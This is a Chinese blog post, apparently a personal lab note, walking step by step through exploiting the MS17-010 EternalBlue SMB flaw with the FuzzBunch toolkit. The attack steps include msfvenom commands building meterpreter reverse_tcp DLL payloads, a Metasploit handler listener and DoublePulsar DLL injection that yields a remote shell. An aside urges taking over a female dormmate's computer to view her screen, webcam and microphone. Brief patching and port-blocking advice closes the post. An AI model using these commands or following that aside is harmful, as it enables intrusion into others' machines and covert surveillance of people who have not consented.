微软EternalBlue永恒之蓝漏洞攻击测试

声明:仅供学习交流使用,个人实验笔记。排版比较懒。

微软MS17-010
理论:SMBv1 漏洞攻击,445端口。

环境准备:

攻击资源:攻击工具包 点我
攻击者系统:Windows 7 Ultimate (x64) 点我
受害者系统:Windows 7 Ultimate (x64) 点我,winXP,win2008,win2003均可。 点我
辅助攻击用系统:kali 点我
推荐虚拟环境构建工具:vmware workstation或oracle Vbox工具下载

操作:

1、攻击者环境部署(确保路径全英文):
虚拟机部署win7 64位环境,要么都桥接,要么都选择自定义网络。
下载python2.6并安装点我
下载pywin32并安装,一定要注意,下载对应python版本点我
将C:\Python26添加到环境变量PATH中。
将攻击工具包拖入虚拟机,或上传到虚拟机。解压后,里面有个Windows的目录,复制出来到虚拟机的c盘。
新建 listeningposts 目录。

2、受害者环境部署:

受害者系统自选一个就行,随意,安装后,需要和攻击者系统能互相ping通。

3、攻击操作:

攻击者在cmd下运行fb.py
target IP就是受害者IP
callbackIP就是攻击者的IP
USE redirection输入NO
base log 输入 c:\logs或输入NO(是否有日志记录,这个是自愿)
接着输入0,新建了一个攻击项目。
项目名称随意(英文以外名字可能会报错)。
然后输入yes确认
其他的直接回车就行了。英文可以用有道翻译。
use EternalBlue
问你是否要setting。输入yes
下面的回车就好,都是默认好的配置。
target system,如实选择受害者的系统。
mode选择fb,即输入1。
剩下的就是yes和回车了。
当出现success关键词的时候,说明攻击第一步已经完成了。
(失败的原因:
1、防火墙的保护。
2、杀毒程序的保护。
3、网络通信异常。
4、人为操作失误。)

部署辅助攻击系统:

1、部署kali,可以和攻击者正常通信即可。
2、攻击者安装xshell。
3、通过xshell ssh到kali即可。(百度关键词,kali开启和配置ssh服务)
4、利用kali 的msf生成后门文件。(LPORT端口参数随意,只要不冲突就行)
如果受害者是winXP 32位:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali系统的ip LPORT=19999 -f dll > /tmp/attack.dll
如果受害者是win7 64位:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=5555 -f dll > /tmp/attack.dll
确认xshell已经连接到了kali,
在xshell输入:sz /opt/attack.dll 
选择保存在攻击者系统的c盘根目录下即可。
xshell下:
msfconsole
use exploit/multi/handler //启用了监听模块
受害者是winXP的时候:
( set payload windows/meterpreter/reverse_tcp
set LHOST kali的ip
set LPORT  19999  
show options  //看一眼配置
run //开启了监听
)
受害者是win7 64位时:
(
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost kali的ip
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit
)

在攻击者的cmd下:
use Doublepulsar
操作系统选择目标的。
选择RunDLL
路径输入:c:\attack.dll
其他各种回车确认。
可以看到,xshell连接的kali,收到了会话连接。
可以输入whoami或者dir来验证一下。

其他资源(感觉部署环境好麻烦,想来点现成的):

在线现成的环境操作实战:点我在线实战
kali下直接实现攻击利用:http://www.jianshu.com/p/f770d0bbed77

杂谈

一般情况,女生的电脑如果和你在一个网络,比如你们宿舍之间,没有做严格的隔离,那么,理论上讲,可以完整的控制她的电脑,除非她安装了360,为何不说她安装了腾讯管家。因为,对付一些漏洞,需要足够的浪才可以,管家还是太文绉绉了。
(不仅可以截屏,还可以看摄像头,还有录音。另:现网实战前,请阅读:https://www.ishuo.cn/doc/mzlpnnqf.html

预防和其他参考:

360提供了懒人模式的NSA攻击自动检测和防护工具,免安装。点我
使用防火墙过滤/关闭 137、139、445端口。
对于 3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。
安装微软补丁:请前往微软官方网站下载与自己操作系统匹配的安全补丁进行更新
MS08-067:https://technet.microsoft.com/zh-cn/library/security/ms08-067.aspx
MS09-050:https://technet.microsoft.com/library/security/ms09-050
MS10-061:https://technet.microsoft.com/zh-cn/library/security/ms10-061.aspx
MS14-068:https://technet.microsoft.com/library/security/MS14-068
MS17-010:https://technet.microsoft.com/zh-cn/library/security/MS17-010

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 206,602评论 6 481
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 88,442评论 2 382
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 152,878评论 0 344
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 55,306评论 1 279
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 64,330评论 5 373
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,071评论 1 285
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,382评论 3 400
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,006评论 0 259
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,512评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,965评论 2 325
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,094评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,732评论 4 323
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,283评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,286评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,512评论 1 262
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,536评论 2 354
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,828评论 2 345

推荐阅读更多精彩内容

  • afinalAfinal是一个android的ioc,orm框架 https://github.com/yangf...
    passiontim阅读 15,401评论 2 45
  • 自己很爱看书,也时常在看书的时候做些笔记读到的至情之句 。 便一字一字的抄写在自己喜欢的白色A4纸上, 这大概是...
    格白李末白阅读 264评论 0 0
  • 【前言】咱们常常听说植物精油对人体有着神奇的力量,也不乏爱美人士成为了精油护肤的高手。那么,咱们是否可以利用精油来...
    蛮小子阅读 3,408评论 0 9
  • 最近电视剧《我的前半生》大火,我倒是没看剧,看到子君的造型就不想看。由于各种平台的作者都在写,各个角度的写,我也知...
    鲜于早早阅读 502评论 7 3
  • 前面介绍了基于MVC拆分UITableView,传送门 拆分UICollectionView的思想与UITable...
    littlewish阅读 537评论 0 5